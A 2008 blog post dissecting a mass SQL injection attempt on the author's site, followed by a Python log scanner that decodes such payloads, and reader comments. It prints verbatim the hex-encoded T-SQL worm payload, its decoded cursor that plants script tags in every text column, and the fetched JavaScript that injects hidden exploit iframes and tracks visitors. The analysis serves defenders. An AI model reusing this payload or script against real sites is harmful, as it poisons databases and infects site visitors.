Steve Trefethen

SQL injection attacks against my XML based blog

September 09 2008 3:58AM

I was reviewing the logs from my site today and noticed this error message:

Error:
System.FormatException: Input string was not in a correct format.
at System.Number.StringToNumber(String str, NumberStyles options, 
NumberBuffer& number, NumberFormatInfo info, Boolean parseDecimal)
...
at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, 
Boolean includeStagesAfterAsyncPoint)
while processing http://www.stevetrefethen.com/blog/monthview.aspx?year=2004;DECLARE @S CHAR(4000);
SET @S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303
029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E61
6D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726
520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F72
20622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F504
54E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220
494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632
827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C7363
72697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223
E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B
6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756
E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E455854
2046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C6
55F437572736F72204445414C4C4F43415445205461626C655F437572736F72 AS CHAR(4000));EXEC(@S);.

As you can see, a bunch of "stuff" has been tacked onto the end of the URL. The year parameter, which monthview.aspx parses as a number (hence the FormatException above), arrives as 2004 followed by a semicolon and a few SQL statements: a stacked query that only does anything if the parameter is concatenated straight into a SQL string on the server. The real statement is hidden as a hex literal, CAST back to CHAR(4000) and run through EXEC(@S), which is enough to slip past anyone grepping logs or filtering input for words like "update" or "script". Decoded, the hex reads as follows (FAIR WARNING: DO NOT ATTEMPT TO BROWSE TO THESE URLS UNLESS YOU KNOW WHAT YOU'RE DOING, YOU'VE BEEN WARNED):

DECLARE @T varchar(255),@C varchar(4000)
DECLARE Table_Cursor CURSOR FOR
select a.name,b.name from sysobjects a,syscolumns b
where a.id=b.id and a.xtype='u' and
(b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0)
BEGIN
exec('update ['+@T+'] set ['+@C+']=''"></title><script src="http://www0.douhunqn.cn/csrss/w.js"></script><!--''+['+@C+'] where '+@C+' not like ''%"></title><script src="http://www0.douhunqn.cn/csrss/w.js"></script><!--''')
FETCH NEXT FROM Table_Cursor INTO @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor
The xtype values 99, 35, 231 and 167 are ntext, text, nvarchar and varchar, so the cursor walks every text column of every user table (xtype 'u') and prepends a closing title tag plus a script tag to each value that doesn't already contain it. Any page that renders one of those columns then loads http://www0.douhunqn.cn/csrss/w.js, which contains the following JavaScript:
// If anything in this script throws, still drop the exploit iframe into the page.
window.onerror = function() {
    document.write("<iframe width=0 height=0 src=http://www0.douhunqn.cn/csrss/new.htm></iframe>");
    return true;
}
// Run once per page: report the visitor to a 51yes.com counter, then load the exploit iframe.
if(typeof(js2eus) == "undefined") {
    var js2eus = 1;
    var yesdata;
    yesdata = '&refe=' + escape(document.referrer) + '&location=' + escape(document.location) + '&color=' + screen.colorDepth + 'x&resolution=' + screen.width + 'x' + screen.height + '&returning=' + cc_k() + '&language=' + navigator.systemLanguage + '&ua=' + escape(navigator.userAgent);
    document.write('<iframe MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no src=http://count41.51yes.com/sa.aspx?id=419214144' + yesdata + ' height=0 width=0></iframe>');
    document.write("<iframe width=0 height=0 src=http://www0.douhunqn.cn/csrss/new.htm></iframe>");
}
// Cookie helpers: return the value of a cookie starting at offset iz.
function y_gVal(iz) {
    var endstr = document.cookie.indexOf(";", iz);
    if(endstr == -1) endstr = document.cookie.length;
    return document.cookie.substring(iz, endstr);
}
// Look up a cookie by name.
function y_g(name) {
    var arg = name + "=";
    var alen = arg.length;
    var clen = document.cookie.length;
    var i = 0;
    var j;
    while(i < clen) {
        j = i + alen;
        if(document.cookie.substring(i, j) == arg) return y_gVal(j);
        i = document.cookie.indexOf(" ", i) + 1;
        if(i == 0) break;
    }
    return null;
}
// Visit counter kept in cck_lasttime / cck_count cookies; returns the number of return visits.
function cc_k() {
    var y_e = new Date();
    var y_t = 93312000;
    var yesvisitor = 1000 * 36000;
    var yesctime = y_e.getTime();
    y_e.setTime(y_e.getTime() + y_t);
    var yesiz = document.cookie.indexOf("cck_lasttime");
    if(yesiz == -1) {
        document.cookie = "cck_lasttime=" + yesctime + "; expires=" + y_e.toGMTString() + "; path=/";
        document.cookie = "cck_count=0; expires=" + y_e.toGMTString() + "; path=/";
        return 0;
    }
    else {
        var y_c1 = y_g("cck_lasttime");
        var y_c2 = y_g("cck_count");
        y_c1 = parseInt(y_c1);
        y_c2 = parseInt(y_c2);
        y_c3 = yesctime - y_c1;
        if(y_c3 > yesvisitor) {
            y_c2 = y_c2 + 1;
            document.cookie = "cck_lasttime=" + yesctime + "; expires=" + y_e.toGMTString() + "; path=/";
            document.cookie = "cck_count=" + y_c2 + "; expires=" + y_e.toGMTString() + "; path=/";
        }
        return y_c2;
    }
}

The script writes a hidden IFRAME pointing at http://www0.douhunqn.cn/csrss/new.htm into the page (once unconditionally, and again from the onerror handler if anything fails), and that page runs more JavaScript attempting to exploit the following ActiveX controls:

  • GLIEDown.IEDown.1
  • IERPCtl.IERPCtl.1
  • MPS.StormPlayer

Fortunately, nothing on my site, including my blog, uses MSSQL, so this isn't particularly troubling for me: the year parameter is parsed as a number, so the request died with the FormatException above instead of reaching a database. A site that concatenated that parameter into a T-SQL string against SQL Server would have had the script tag prepended to every text column of every user table. It sort of looks like it could be related to this sort of attack, as the domains have the .cn suffix for China and the description sounds quite similar.

Other than perusing my logs occasionally I don’t have anything that scans my logs looking for potential exploits. Do you use anything? If so, what approach do you use?
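Since I decoded the hex above by hand, here is an added example (my own code, not part of the original post or of any tool mentioned in it) of doing the decoding and the log scanning in one go: it looks for a stacked statement riding on a query parameter, decodes any CAST(0x... AS CHAR(n)) literal into the T-SQL that SQL Server would have executed, and reports what that statement does and which hosts it points victims at. It assumes the request URL appears in each log line as a single whitespace-delimited token containing a question mark, as in the error log above; the SAMPLE_SQL, SAMPLE_LOG and evil.example host are constructed for the example.

```python
"""Scan request logs for the hex-encoded, stacked-query SQL injection seen in the post.

The worm appends ``;DECLARE @S CHAR(4000);SET @S=CAST(0x... AS CHAR(4000));EXEC(@S);``
to a query-string parameter.  This script finds such requests, decodes the hex
literal into the T-SQL that SQL Server would have run, and reports what it does.
"""
import re
from typing import Iterable, Iterator, Optional
from urllib.parse import unquote

# A second statement stacked onto a parameter value: ";DECLARE ...", ";EXEC ...", etc.
STACKED_SQL = re.compile(
    r";\s*(?:DECLARE|SET|EXEC(?:UTE)?|UPDATE|INSERT|DELETE|DROP)\b", re.IGNORECASE)

# CAST(0x<hex> AS CHAR(n)) / NVARCHAR(n): the hex literal hides the real statement
# from anyone grepping the logs for "update" or "<script".
HEX_CAST = re.compile(
    r"CAST\(\s*0x([0-9A-Fa-f]+)\s+AS\s+(N?)(?:VAR)?CHAR\(\s*\d+\s*\)\s*\)", re.IGNORECASE)

# What the decoded statement is trying to do; the keys are report labels.
INDICATORS = {
    "enumerates user tables and columns": re.compile(
        r"\bsysobjects\b|\bsyscolumns\b|information_schema", re.IGNORECASE),
    "rewrites column contents": re.compile(r"\bupdate\b.+?\bset\b", re.IGNORECASE | re.DOTALL),
    "plants a <script src=...> tag": re.compile(r"<script\s+src=", re.IGNORECASE),
}


def decode_hex_literal(hexdigits: str, unicode_flag: str) -> str:
    """Turn a 0x... literal into the text SQL Server would execute.

    CHAR/VARCHAR hold single-byte text; NCHAR/NVARCHAR hold UTF-16LE.
    Assumption: an odd-length literal is left-padded with a zero nibble,
    which is how SQL Server reads 0x123 (as 0x0123).
    """
    if len(hexdigits) % 2:
        hexdigits = "0" + hexdigits
    raw = bytes.fromhex(hexdigits)
    return raw.decode("utf-16-le" if unicode_flag else "latin-1", errors="replace")


def analyse_request(url: str) -> Optional[dict]:
    """Return a finding for a request URL carrying this injection, else None."""
    query = unquote(url.partition("?")[2])  # IIS logs keep the query percent-encoded
    if not STACKED_SQL.search(query):
        return None
    decoded = "\n".join(decode_hex_literal(h, n) for h, n in HEX_CAST.findall(query))
    indicators = [label for label, pat in INDICATORS.items() if pat.search(decoded)]
    # Hosts the payload points victims at: what to block, and what to hunt for in page content.
    hosts = sorted(set(re.findall(r"""https?://([^/\s'"<>]+)""", decoded, re.IGNORECASE)))
    return {"url": url, "decoded_sql": decoded, "indicators": indicators, "hosts": hosts}


def scan_log(lines: Iterable[str]) -> Iterator[dict]:
    """Yield a finding for every log line whose request URL carries the payload.

    Assumption: the request appears as one whitespace-delimited token containing '?',
    as in the error log quoted in the post.
    """
    for line in lines:
        for token in re.findall(r"\S*\?\S+", line):
            finding = analyse_request(token)
            if finding:
                yield finding


# --- constructed sample data (not real log lines) ---------------------------
SAMPLE_SQL = (
    "DECLARE @T varchar(255),@C varchar(4000) "
    "DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b "
    "where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) "
    "OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN "
    "exec('update ['+@T+'] set ['+@C+']=''\"></title><script src=\"http://evil.example/w.js\">"
    "</script><!--''+['+@C+']') "
    "FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor"
)
HEX_PAYLOAD = SAMPLE_SQL.encode("latin-1").hex().upper()

SAMPLE_LOG = [
    "2008-09-09 03:57:59 GET http://www.example.com/blog/monthview.aspx?year=2004&month=9 200",
    "2008-09-09 03:58:00 GET http://www.example.com/blog/monthview.aspx?year=2004;DECLARE%20@S%20CHAR(4000);"
    "SET%20@S=CAST(0x" + HEX_PAYLOAD + "%20AS%20CHAR(4000));EXEC(@S); 500",
]


def findings() -> list:
    """Run the scanner over the constructed sample log."""
    return list(scan_log(SAMPLE_LOG))


if __name__ == "__main__":
    for f in findings():
        print("hit:", f["url"][:80] + "...")
        print("  does:", ", ".join(f["indicators"]))
        print("  hosts:", ", ".join(f["hosts"]))
        print("  decoded:", f["decoded_sql"][:120] + "...")
```

Point scan_log at a real IIS log (or at the error mails ELMAH sends) and the hosts list gives you the domains to block at the proxy and to grep for in any database that renders user content; the "rewrites column contents" indicator is the one that should page somebody, since it means the payload was trying to poison stored data rather than just read it.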


Comments

9/9/2008 10:10:16 AM

David Glassborow

Steve,
       For Unix boxes there is an excellent tool called OSSEC (http://www.ossec.net/) which I have used for a while (it emails you when people attack your server, can adjust firewalls to block brute-force attacks, etc.). They have recently started supporting Windows as well, so it may be worth your time to check it out.

Cheers,
Dave


9/9/2008 11:14:14 AM

Keith G.

The same attack was tried on our SaaS servers at work.  It was nice to know we have good protection in place against that kind of thing, but it was a little disturbing nonetheless.


9/12/2008 10:56:31 PM

James Johnson

Hi Steve,

I use ELMAH for unhandled exceptions on my user group site, and it emails me with errors. I had two of these today as well. I didn't go so far as downloading the javascript, so thanks for telling us what that was about.

James Johnson
Inland Empire .NET User's Group


9/15/2008 1:43:36 PM

KM

I would have put images of the script, not their actual text. Just to avoid it being indexed and hinder cut&paste.


9/15/2008 4:09:12 PM

Steve Trefethen

KM,
  Since it isn't straight JavaScript code (it's syntax-highlighted JS), I think the issues of indexing and cut/paste are negligible, as it would take a fair amount of manual editing to reconstruct the actual JavaScript.

